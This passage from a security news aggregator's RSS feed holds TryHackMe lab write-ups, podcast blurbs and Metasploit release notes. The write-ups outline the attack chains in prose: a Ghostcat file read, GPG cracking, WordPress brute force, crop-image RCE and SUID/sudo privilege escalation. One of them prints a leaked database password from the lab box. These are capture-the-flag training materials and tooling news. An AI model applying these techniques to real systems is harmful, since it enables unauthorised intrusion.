src="https://cdn-images-1.medium.com/max/891/1*ouCaERht9sudnV8VE4zVrg.png"><figcaption>GOT Root.</figcaption></figure><p>Thanks for Reading Everyone &amp; Stay Tuned for the next Writeups.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=7b54454d8365" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/source-thm-box-writeup-7b54454d8365">Source THM Box Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ghost Tom Box on TryHackMe.com]]></title>
<description><![CDATA[In Every penetration testing engagement we start with reconnaissance, lets start with using our favorite tool “nmap”Scanning with Nmap to Check for Vulnerabilities and Open Ports.Later after digging in I searched for Jserv ghostcat, after that I managed to find an auxiliary module that reads a fi...]]></description>
<link>https://tsecurity.de/de/3365750/hacking/ghost-tom-box-on-tryhackmecom/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365750/hacking/ghost-tom-box-on-tryhackmecom/</guid>
<pubDate>Fri, 20 Mar 2026 06:35:08 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In Every penetration testing engagement we start with reconnaissance, lets start with using our favorite tool “nmap”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/855/1*bsNejWxzocLcWYcz7HUekA.png"><figcaption>Scanning with Nmap to Check for Vulnerabilities and Open Ports.</figcaption></figure><p>Later after digging in I searched for Jserv ghostcat, after that I managed to find an auxiliary module that reads a file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/960/1*bCf-aDQFtkrvAbXktZrcNA.png"><figcaption>Using Metasploit to read the file.</figcaption></figure><p>I managed to find the password for a User Called sky*** lets login into SSH and check if the credentials are valid.</p><p>First we have to convert the gpg to readable text, so we can later crack it successfully.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/782/1*moouPe0cAx-NwyFc7Xyd7Q.png"><figcaption>Cracking the GPG Hash.</figcaption></figure><p>Second we import the GPG Hash with gpg in the sky*** user</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/741/1*wq2XDpybh4R9Glstrln4Vw.png"><figcaption>Decrypting and Acquiring user’s Merlin passowrd.</figcaption></figure><p>later we manage to login as the merlin user with the credential found and next, we type sudo -l to see what the user can run on the box.</p><p>we can see that /usr/bin/zip can be ran as sudo on merlin box, lets go to gtfoutbins to see the commands needed for root.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/567/1*mV3BPPV-8-DhqTdYe4Cefg.png"><figcaption>Getting root &amp; Wrapping up the Session.</figcaption></figure><p>Bingo Root is achieved, until next ones!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=b8683e1db32a" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/ghost-tom-box-on-tryhackme-com-b8683e1db32a">Ghost Tom Box on TryHackMe.com</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Blog TryHackMe Box Writeup]]></title>
<description><![CDATA[In every penetration testing practice we start by examining the target, starting with information gathering :Lets start by using nmap as our information gathering tool of choiceScan Results with Nmap.we found a couple of ports open with the shown services in the screenshot above ^next lets start ...]]></description>
<link>https://tsecurity.de/de/3365550/hacking/blog-tryhackme-box-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365550/hacking/blog-tryhackme-box-writeup/</guid>
<pubDate>Fri, 20 Mar 2026 04:36:46 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In every penetration testing practice we start by examining the target, starting with information gathering :</p><p>Lets start by using nmap as our information gathering tool of choice</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wGU1r2iNmhX-ZCbOcXBRhg.png"><figcaption>Scan Results with Nmap.</figcaption></figure><p>we found a couple of ports open with the shown services in the screenshot above ^</p><p>next lets start enumerating our target with our tool of choice “gobuster” &gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QV69XLODNsTyeGv5ItQbHQ.png"><figcaption>Enumeration Results with GoBuster.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*j55cNMQvJ44PSB30SC7j0A.png"><figcaption>Found two Users using auxiliary tool in Metasploit.</figcaption></figure><p>as we can see in the results above we found two usernames : bjoel and khweel , maybe lets try to bruteforce the login page with those users in mind? with common passwords perhaps?</p><blockquote>Moving along</blockquote><p>Next we run the wpscan tool for conducting a vulnerability test on the wordpress webpage in this case we are looking for the password for the user khweel &gt;&gt;&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/916/1*PJJWY0tolRM0ZErLLcyaGQ.png"><figcaption>Running WpScan Tool against the user file with the known wordlist “RockYou”</figcaption></figure><p>BINGO!</p><blockquote>the password for khweel is found, which is “XXXXX”<br> <br> <br> after some digging I found out that Wordpress 5.0 is vulnerable to multiple vulnerabilities.<br> <br> one of those vulnerabilities is : WordPress Crop-image Shell Upload <br> <br> <br> <br> using this exploit which is also available in metasploit we can use it as follows :</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*udepiQ762ghR_bk55U2hHQ.png"><figcaption>using the RCE To get a shell.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZMDeSpjdLU74_JrZ-qxtpg.png"><figcaption>Exploit Completed and Gained an initial Shell.</figcaption></figure><p>After laying foothold on the machine, and looking for a possible prevesc, I’ve found some creds ; <br> <br> define(‘DB_USER’, ‘wordpressuser’);<br>define(‘DB_PASSWORD’, ‘LittleYellowLamp90!@’);</p><p>lets keep these credentials for later we might need them and might not!</p><p>we run this command to check for SUID files and directories that www-data has acess to :</p><p>find / -perm -4000 2&gt;/dev/null</p><p>one interesting directory is /usr/sbin/checker, lets check it out :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/331/1*rivfOXR0tAYkD1QAwf9Vow.png"><figcaption>Checker Executable in sbin. (interesting PrevESC)</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/694/1*2AT6V_HnRoZgT6W0hdMBVA.png"><figcaption>Reverse engineer it with ltrace..</figcaption></figure><p>And finally I managed to crack this open and get Root!</p><p>thanks for reading everyone and see you in the next one!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/676/1*6mG2Pq-Rd_fcD3r-yBPZkA.png"><figcaption>Gained Root on the box !</figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=55b5abe7e28d" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/blog-tryhackme-box-writeup-55b5abe7e28d">Blog TryHackMe Box Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2023 End-of-Year Wrapup - ESW Vault]]></title>
<description><![CDATA[This is a special episode of ESW: our year-end wrapup for 2023. Want to make sure you didn't miss any big stories in 2023? This is the episode to check out! In under an hour, we'll summarize 2023, covering things like:  our mindset coming into 2023 from 2022 how 2023 kicked off some special theme...]]></description>
<link>https://tsecurity.de/de/3356717/it-security-nachrichten/2023-end-of-year-wrapup-esw-vault/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3356717/it-security-nachrichten/2023-end-of-year-wrapup-esw-vault/</guid>
<pubDate>Tue, 17 Mar 2026 18:06:55 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a special episode of ESW: our year-end wrapup for 2023. Want to make sure you didn't miss any big stories in 2023? This is the episode to check out! In under an hour, we'll summarize 2023, covering things like:</p> <ol> <li>our mindset coming into 2023 from 2022</li> <li>how 2023 kicked off</li> <li>some special themed episodes we recorded in 2023</li> <li>the state of the fragile and recovering startup market</li> <li>key acquisitions in 2023 and some acquisition rumors that never led to anything</li> <li>breach post-mortems and special lessons learned episodes we did in 2023</li> <li>some notable drama and dumpster fires</li> <li>2023 themes and trends</li> <li>and some of our favorite newsletters, books, and tools from 2023</li> </ol> <p>Enjoy!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/vault-esw-7">https://securityweekly.com/vault-esw-7</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Infosec Myths, Mistakes, and Misconceptions - Adrian Sanabria - ASW #279]]></title>
<description><![CDATA[Sometimes infosec problems can be summarized succinctly, like "patching is hard". Sometimes a succinct summary sounds convincing, but is based on old data, irrelevant data, or made up data. Adrian Sanabria walks through some of the archeological work he's done to dig up the source of some myths. ...]]></description>
<link>https://tsecurity.de/de/3356642/it-security-nachrichten/infosec-myths-mistakes-and-misconceptions-adrian-sanabria-asw-279/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3356642/it-security-nachrichten/infosec-myths-mistakes-and-misconceptions-adrian-sanabria-asw-279/</guid>
<pubDate>Tue, 17 Mar 2026 18:05:56 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Sometimes infosec problems can be summarized succinctly, like "patching is hard". Sometimes a succinct summary sounds convincing, but is based on old data, irrelevant data, or made up data. Adrian Sanabria walks through some of the archeological work he's done to dig up the source of some myths. We talk about some of our favorite (as in most disliked) myths to point out how oversimplified slogans and oversimplified threat models lead to bad advice -- and why bad advice can make users less secure.</p> <p>Segment resources:</p> <ul> <li><a rel="noopener" target="_blank" href="https://www.oreilly.com/library/view/cybersecurity-myths-and/9780137929214/"> https://www.oreilly.com/library/view/cybersecurity-myths-and/9780137929214/</a></li> </ul> <p>The OWASP Top 10 gets its first update after a year, Metasploit gets its first rewrite (but it's still in Perl), PHP adds support for prepared statements, RSA Conference puts passwords on notice while patching remains hard, and more!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/asw">https://www.securityweekly.com/asw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/asw-279">https://securityweekly.com/asw-279</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonomous - I don't think that word means what you think it means - Adam Shostack, Ely Kahn - ESW #359]]></title>
<description><![CDATA[A clear pattern with startups getting funding this week are "autonomous" products and features.  Automated detection engineering Autonomously map and predict malicious infrastructure ..."helps your workforce resolve their own security issues autonomously" automated remediation automated complianc...]]></description>
<link>https://tsecurity.de/de/3356621/it-security-nachrichten/autonomous-i-dont-think-that-word-means-what-you-think-it-means-adam-shostack-ely-kahn-esw-359/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3356621/it-security-nachrichten/autonomous-i-dont-think-that-word-means-what-you-think-it-means-adam-shostack-ely-kahn-esw-359/</guid>
<pubDate>Tue, 17 Mar 2026 18:05:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A clear pattern with startups getting funding this week are "autonomous" products and features.</p> <ul> <li><strong>Automated</strong> detection engineering</li> <li><strong>Autonomously</strong> map and predict malicious infrastructure</li> <li>..."helps your workforce resolve their own security issues <strong>autonomously</strong>"</li> <li><strong>automated</strong> remediation</li> <li><strong>automated</strong> compliance management &amp; reporting</li> </ul> <p>I'll believe it when I see it. Don't get me wrong, I think we're in desperate need of more automation when it comes to patching and security decision-making. I just don't think the majority of the market has the level of <em>confidence</em> necessary to trust security products to automate things without a human in the loop.</p> <p>The way LimaCharlie is going about it, with their new bi-directional functionality they're talking up right now, might work, as detections can be VERY specific and fine-grained.</p> <p>We've already seen a round of fully automated guardrail approaches (particularly in the Cloud) fail, however. My prediction? Either what we're seeing isn't truly automated, or it will become a part of the product that no one uses - like Metasploit Pro licenses.</p> <p> </p> <p>We've talked about generative AI in a general sense on our podcast for years, but we haven't done many deep dives into specific security use cases. That ends with this interview, as we discuss how generative AI can improve SecOps with Ely Kahn. Some of the use cases are obvious, while others were a complete surprise to me. Check out this episode if you're looking for some ideas!</p> <p>This segment is sponsored by SentinelOne. Visit <a href="https://securityweekly.com/sentinelone" target="_blank" rel="noopener">https://securityweekly.com/sentinelone</a> to learn more about them!</p> <p> </p> <p>This is a great interview with Adam Shostack on all things threat modeling. He's often the first name that pops into people's heads when threat modeling comes up, and has created or been involved with much of the foundational material around the subject. Adam recently released a whitepaper that focuses on and defines <em>inherent threats</em>.</p> <p>Resources:</p> <ul> <li>Here's the <a href="https://shostack.org/files/papers/Inherent-Threats-Whitepaper-Shostack.pdf" target="_blank" rel="noopener">Inherent Threats Whitepaper</a></li> <li>Adam's book, <a href="https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998/" target="_blank" rel="noopener">Threat Modeling: Designing for Security</a></li> <li>Adam's latest book, <a href="https://www.amazon.com/Threats-Every-Engineer-Should-Learn/dp/1119895162" target="_blank" rel="noopener">Threats: What Every Engineer Should Learn from Star Wars</a></li> <li>We mention the Okta Breach - <a href="https://www.valencesecurity.com/resources/blogs/five-lessons-learned-from-oktas-support-site-breach" target="_blank" rel="noopener">here's my writeup on it</a></li> <li>We mention the CSRB report on the Microsoft/Storm breach, here's <a href="https://shostack.org/blog/csrb-report-on-microsoft/" target="_blank" rel="noopener">Adam's blog post on it</a></li> <li>And finally, Adam mentions the British Library incident report, <a href="https://www.bl.uk/home/british-library-cyber-incident-review-8-march-2024.pdf" target="_blank" rel="noopener">which is here</a>, and Adam's <a href="https://shostack.org/blog/british-library-incident-report/" target="_blank" rel="noopener">blog post is here</a></li> </ul> <p>Visit <a href="https://www.securityweekly.com/esw" target="_blank" rel="noopener">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a href="https://securityweekly.com/esw-359" target="_blank" rel="noopener">https://securityweekly.com/esw-359</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 03/13/2026]]></title>
<description><![CDATA[No bad luck here: Friday the 13th brings new modules and a Metasploit Pro milestoneThis week’s Metasploit Framework release delivers three new modules across reconnaissance, evasion, and exploitation: LeakIX-powered discovery for exposed services and leaked data, a Linux x64 RC4 payload packer fo...]]></description>
<link>https://tsecurity.de/de/3348100/it-security-nachrichten/metasploit-wrap-up-03132026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3348100/it-security-nachrichten/metasploit-wrap-up-03132026/</guid>
<pubDate>Fri, 13 Mar 2026 20:22:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>No bad luck here: Friday the 13th brings new modules and a Metasploit Pro milestone</h2><p>This week’s Metasploit Framework release delivers three new modules across reconnaissance, evasion, and exploitation: LeakIX-powered discovery for exposed services and leaked data, a Linux x64 RC4 payload packer for more flexible evasive delivery, and an unauthenticated RCE module for SPIP Saisies (CVE-2025-71243). Alongside those additions, we shipped practical quality-of-life improvements including a smaller configurable bind_netcat payload path, automatic WordPress service reporting in the WordPress mixin, and a fix for Base64Decoder defaults in shell payload workflows.</p><p>Finally, we’re also excited to share the new Metasploit Pro 5.0.0 release with an updated UI and SSO support amongst other changes, check out the announcement here: <a href="https://www.rapid7.com/blog/post/pt-announcing-metasploit-pro-5-penetration-testing-evolving/">Announcing Metasploit Pro 5: Penetration Testing, Evolving</a>.</p><h2>New module content (3)</h2><h3>LeakIX Search</h3><p>Authors: LeakIX <a href="mailto:support@leakix.net">support@leakix.net</a> and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21002">#21002</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: gather/leakix_search</p><p>Description: Adds a new module auxiliary/gather/leakix_search, a new module for LeakIX API - a search engine focused on indexing internet-exposed services and leaked credentials/databases.</p><h3>Linux RC4 Encrypted Payload Generator</h3><p>Author: Massimo Bertocchi</p><p>Type: Evasion</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20966">#20966</a> contributed by <a href="https://github.com/litemars">litemars</a></p><p>Path: linux/x64/rc4_packer</p><p>Description: Adds a new module evasion/linux/x64/rc4_packer packer that encrypts the generated payload with RC4, prepends an optional sleep-based delay (nanosleep), and decrypts/executes the payload at runtime via a compact precompiled stub.</p><h3>SPIP Saisies Plugin Unauthenticated RCE</h3><p>Authors: OpenStudio and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21001">#21001</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: multi/http/spip_saisies_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-71243&amp;referrer=blog">CVE-2025-71243</a></p><p>Description: This adds a new module for CVE-2025-71243, an unauthenticated PHP code-injection vulnerability in the SPIP Saisies plugin. The injection takes place through _anciennes_valeurs, which allows an attacker to inject a PHP payload.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20885">#20885</a> from <a href="https://github.com/dledda-r7">dledda-r7</a> - Updates the bind_netcat payload to allow it to be smaller by selecting either default or BSD-style netcat command syntax. Previously, the payload ran both command syntaxes combined by an OR operator so wherever it was executed, the payload worked. The default behavior remains to run both, but in the event a user needs a significantly shorter payload, they can select a single netcat syntax and adjust the filenames.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20961">#20961</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - This adds service reporting to Wordpress mixin. Now, when you use a Wordpress module, it will automatically report the target as Wordpress if detected.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21088">#21088</a> from <a href="https://github.com/jbx81-1337">jbx81-1337</a> - This adds a default value for the Base64Decoder option to fix an issue with shell payloads using the default base64 encoder.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-03-05T14%3A49%3A28Z..2026-03-10T20%3A31%3A01Z%22">Pull Requests 6.4.119...6.4.122</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.119...6.4.122">Full diff 6.4.119...6.4.122</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-03-13 12h : 8 posts]]></title>
<description><![CDATA[8 posts were published in the last hour 10:32 : Metasploit Pro 5.0.0 Released With Powerful New Modules and Critical Enhancements 10:32 : Veeam Patches Multiple Critical RCE Vulnerabilities on Backup Server 10:32 : How Breach-Focused Microsegmentation Could Have Contained…
Read more →
The post IT...]]></description>
<link>https://tsecurity.de/de/3346174/it-security-nachrichten/it-security-news-hourly-summary-2026-03-13-12h-8-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3346174/it-security-nachrichten/it-security-news-hourly-summary-2026-03-13-12h-8-posts/</guid>
<pubDate>Fri, 13 Mar 2026 12:07:26 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>8 posts were published in the last hour 10:32 : Metasploit Pro 5.0.0 Released With Powerful New Modules and Critical Enhancements 10:32 : Veeam Patches Multiple Critical RCE Vulnerabilities on Backup Server 10:32 : How Breach-Focused Microsegmentation Could Have Contained…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-03-13-12h-8-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-03-13-12h-8-posts/">IT Security News Hourly Summary 2026-03-13 12h : 8 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Pro 5.0.0 Released With Powerful New Modules and Critical Enhancements]]></title>
<description><![CDATA[As cybercriminals continue to weaponize new vulnerabilities, the demand for continuous red-teaming and proactive security assessments has never been higher. Annual penetration tests are no longer enough to secure modern, complex environments. To help security teams stay ahead of advanced threat a...]]></description>
<link>https://tsecurity.de/de/3346111/it-security-nachrichten/metasploit-pro-500-released-with-powerful-new-modules-and-critical-enhancements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3346111/it-security-nachrichten/metasploit-pro-500-released-with-powerful-new-modules-and-critical-enhancements/</guid>
<pubDate>Fri, 13 Mar 2026 11:36:42 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As cybercriminals continue to weaponize new vulnerabilities, the demand for continuous red-teaming and proactive security assessments has never been higher. Annual penetration tests are no longer enough to secure modern, complex environments. To help security teams stay ahead of advanced threat actors, Metasploit Pro 5.0.0 has officially been released. This major update delivers a fundamentally […]</p>
<p>The post <a href="https://cybersecuritynews.com/metasploit-pro-5-0-0-released/">Metasploit Pro 5.0.0 Released With Powerful New Modules and Critical Enhancements</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Pro 5.0.0 Released With Powerful New Modules and Critical Enhancements]]></title>
<description><![CDATA[As cybercriminals continue to weaponize new vulnerabilities, the demand for continuous red-teaming and proactive security assessments has never been higher. Annual penetration tests are no longer enough to secure modern, complex environments. To help security teams stay ahead of advanced…
Read mo...]]></description>
<link>https://tsecurity.de/de/3346101/it-security-nachrichten/metasploit-pro-500-released-with-powerful-new-modules-and-critical-enhancements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3346101/it-security-nachrichten/metasploit-pro-500-released-with-powerful-new-modules-and-critical-enhancements/</guid>
<pubDate>Fri, 13 Mar 2026 11:36:22 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As cybercriminals continue to weaponize new vulnerabilities, the demand for continuous red-teaming and proactive security assessments has never been higher. Annual penetration tests are no longer enough to secure modern, complex environments. To help security teams stay ahead of advanced…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/metasploit-pro-5-0-0-released-with-powerful-new-modules-and-critical-enhancements/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/metasploit-pro-5-0-0-released-with-powerful-new-modules-and-critical-enhancements/">Metasploit Pro 5.0.0 Released With Powerful New Modules and Critical Enhancements</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Face of Penetration Testing is Changing: Announcing Metasploit Pro 5.0.0]]></title>
<description><![CDATA[The role and demand for red-teaming capabilities are growing, as more exploitable CVEs make their way into criminal hands. Being proactive is no longer a capability that can be reserved for annual tests, but a continuous assessment to determine exposure and even through the validation of an organ...]]></description>
<link>https://tsecurity.de/de/3343891/it-security-nachrichten/the-face-of-penetration-testing-is-changing-announcing-metasploit-pro-500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3343891/it-security-nachrichten/the-face-of-penetration-testing-is-changing-announcing-metasploit-pro-500/</guid>
<pubDate>Thu, 12 Mar 2026 14:21:16 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The role and demand for red-teaming capabilities are growing, as more exploitable CVEs make their way into criminal hands. Being proactive is no longer a capability that can be reserved for annual tests, but a continuous assessment to determine exposure and even through the validation of an organization's security posture. With this in mind, we are delighted to announce the long awaited availability of </span><span><strong>Metasploit Pro 5.0.0 </strong></span><span>–</span><span><strong> </strong></span><span>which is not just an update, but a fundamentally new approach to red-teaming, designed with the sole intention of staying ahead of ever-increasingly capable threat actors. </span></p><p><span>Amongst the multitude of changes, Metasploit 5.0.0 offers an intuitive testing workflow that removes the ever evolving complexity of testing, as well as a suite of powerful new modules and critical enhancements. This is the version you can't afford to miss. For all the technical details, the granular release notes can be viewed </span><a href="https://docs.rapid7.com/insight/release-notes-5.0.0-2026031101/" target="_blank"><span>here</span></a><span>.</span></p><h2><span>So what’s new?</span></h2><h3><span>Intuitive testing workflow</span></h3><p><span>Say goodbye to complexity, as Metasploit Pro has completely overhauled the testing workflow. Updates are highlighted by an intuitive user interface, ensuring that your focus remains on high-value penetration testing and vulnerability validation, not fighting the interface. These changes are the foundation for the future, preserving the core functionality you rely on while enabling even more powerful features down the road.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt797cdcb9951018d0/69b1f828c048556821e8504e/image2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image2.png" asset-alt="image2.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt797cdcb9951018d0/69b1f828c048556821e8504e/image2.png" data-sys-asset-uid="blt797cdcb9951018d0" data-sys-asset-filename="image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image2.png" sys-style-type="display"></figure><p>⠀</p><p><span>Stop guessing and start seeing. The new implementation of Network Topology support provides instant, crystal-clear clarity on hosts that have been compromised, have associated cracked credentials, or captured data. For enterprise environments with vast, complex surfaces, we’ve invested in performance improvements, giving you the power to zoom and pan through hundreds of available hosts with zero lag. This is actionable visualization that transforms data into defense.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt30934816d54b0800/69b1f8281c794a12b43274c3/image6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image6.png" asset-alt="image6.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt30934816d54b0800/69b1f8281c794a12b43274c3/image6.png" data-sys-asset-uid="blt30934816d54b0800" data-sys-asset-filename="image6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image6.png" sys-style-type="display"></figure><p>⠀</p><h3><span>Vulnerability detection improvements</span></h3><p><span>Get the necessary assurance before you click 'run.' Metasploit modules can now register crucial vulnerability detection details as part of running. This means that modules capable of running pre-check detection logic give you the full intelligence picture before you attempt exploitation. This new level of transparency and detail empowers you to make smarter, faster decisions, saving you precious time and minimizing the chance of failed module runs and adverse side effects.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltac4e677f7930cc86/69b1f8287e503c5240b2deb3/image4.png" height="671" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image4.png" asset-alt="image4.png" width="1223" max-width="1223" max-height="671" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltac4e677f7930cc86/69b1f8287e503c5240b2deb3/image4.png" data-sys-asset-uid="bltac4e677f7930cc86" data-sys-asset-filename="image4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image4.png" sys-style-type="display"></figure><p>⠀</p><h3><span>Advanced workflow improvements</span></h3><p><span>Unleash your inner expert with unprecedented control and efficiency. Advanced users of Metasploit Pro will immediately benefit from multiple UX improvements to the single module run page. Tired of manually configuring options? Users now receive intelligent suggestions for applicable values, including network targets, Kerberos credential cache files, and more –  streamlining ADCS workflows.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltddbbe49d90e28bd9/69b1f8281bca047b72eaa789/image3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image3.png" asset-alt="image3.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltddbbe49d90e28bd9/69b1f8281bca047b72eaa789/image3.png" data-sys-asset-uid="bltddbbe49d90e28bd9" data-sys-asset-filename="image3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image3.png" sys-style-type="display"></figure><p>⠀</p><p><span>Furthermore, you now have the ability to manually choose and configure individual payloads, giving you the final word on how you exploit targets. Metasploit Pro will continue to default to the most common payload for each exploit.</span></p><p><span>Plus, new quality-of-life improvements for replaying module runs ensure that verifying remediation and re-exploiting targets is a seamless, one-click process. Gone are the days of reconfiguring an entire module run to change a single option. The old list view has also been updated to include the ability to view the module option details that a module was run with. These capabilities can additionally be leveraged by advanced users who are interacting with Metasploit Pro in a programmatic fashion or through the command line interface to see exactly how Metasploit Pro is running modules.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta6c9debba40f4209/69b1f8283984d27906e0d8cf/image1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image1.png" asset-alt="image1.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta6c9debba40f4209/69b1f8283984d27906e0d8cf/image1.png" data-sys-asset-uid="blta6c9debba40f4209" data-sys-asset-filename="image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image1.png" sys-style-type="display"></figure><p>⠀</p><p><span>Finally, 